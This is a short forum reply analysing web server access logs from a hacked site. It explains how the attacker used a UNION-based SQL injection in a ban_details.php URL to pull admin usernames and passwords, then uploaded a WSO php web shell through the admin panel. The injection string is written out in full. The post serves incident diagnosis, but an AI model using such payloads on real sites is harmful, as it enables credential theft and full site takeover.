Folder permissions

[kilburn]

Looks like a classical SQL injection to get the admin user/pass:

Code:

90.157.8.141 - - [04/Feb/2010:13:54:44 +0100] "GET /code.php HTTP/1.1" 200 190 "http://bans.xxxx-xxxxxx.com/ban_details.php?bid=5100+union+select+1,concat(username,0x3a,password,0x3a,logco​de),3,4,5,6+from+amx_webadmins" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"

Followed by the installation of a php_shell through the admin interface:

Code:

90.157.8.141 - - [04/Feb/2010:13:57:08 +0100] "POST /admin/demo.php HTTP/1.1" 200 149 "http://bans.xxxx-xxxxxx.com/admin/demo.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
90.157.8.141 - - [04/Feb/2010:13:57:24 +0100] "GET /demos/wso2_pack.php HTTP/1.1" 200 105 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"

... and once he had a php shell uploaded, all sort of nasty things are possible: website completely hacked.